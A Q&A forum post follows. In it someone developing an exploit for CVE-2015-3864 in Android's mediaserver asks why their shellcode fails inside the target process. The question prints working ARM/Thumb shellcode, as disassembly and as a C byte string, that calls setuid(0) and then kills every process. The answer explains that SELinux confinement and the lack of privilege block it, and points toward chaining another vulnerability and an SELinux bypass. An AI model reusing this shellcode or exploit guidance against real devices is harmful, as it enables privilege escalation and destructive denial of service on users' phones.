run a shellcode in the context of mediaerver in android

Question

I write an exploit for a vulnerability in mediaserver in android(CVE-2015-3864). The goal is running a shellcode with root privilege(such as kill all processes). every steps of exploit are working as expected until it reaches the shell code(at this time the shellcode is loaded in mediaserver virtual memory and rwx permission is granted to it). Shell code is as follows:

 1) e28f3001    add r3, pc, #1   ; 0x1
 2) e12fff13    bx  r3
 3) 1b24        subs    r4, r4, r4
 4) 1c20        adds    r0, r4, #0
 5) 2717        movs    r7, #23
 6) df01        svc 1
 7) 1a92        subs    r2, r2, r2
 8) 1c10        adds    r0, r2, #0
 9) 3801        subs    r0, #1
 10) 2109        movs    r1, #9
 11) 2725        movs    r7, #37
 12) df01        svc 1 

lines 1 and 2 is a switch between arm mode and thumb mode. lines 3 to 6 is setuid(0) and lines 7 to 12 kill all running processes.
I debug the exploit with IDA and i found out that the shellscript executed until line 12 ( all the register have the expected values which are defined in the shellcode for example r7 is 37).
MY SPECIFIC PROBLEM IS : shellcode does not execute and has no impact on my device.
for a test case i write a program and run the shellcode as a function pointer like below:

    `char *SC = "\x01\x30\x8f\xe2"
               "\x13\xff\x2f\xe1"
               "\x24\x1b\x20\x1c"
               "\x17\x27\x01\xdf"
               "\x92\x1a\x10\x1c"
               "\x01\x38\x09\x21"
               "\x25\x27\x01\xdf"`

    `

        int main(void)
        {
                fprintf(stdout,"Length: %d\n",strlen(SC))
                (*(void(*)()) SC)()
         return 0

}`

i copied this binary to /system/bin and grant exactly the same permission as mediaserver has. i run the binary with su permission and it works! all the processes were killed.
MY SPECIFIC QUESTION IS : Why shellcode can not be executed in the context of mediaserver but it can be executed independently?
please help, i really stuck in this state! if the question is unclear, feedback me to explain it more.
thank in advance

Answer 1

I think you need to elevate the privilege of mediaserver(user media) for kill all process(then you need another vulnerability). There is another problem due to SELinux sandbox restrictions this means that the mediaserver process whe exploit libstagefright is protected by SELinux policy and the code execution takes place in a restrictive sandbox. In other word you should be find a way for SELinux bypass, in nccgroup presentation you can find more details.

See also this good paper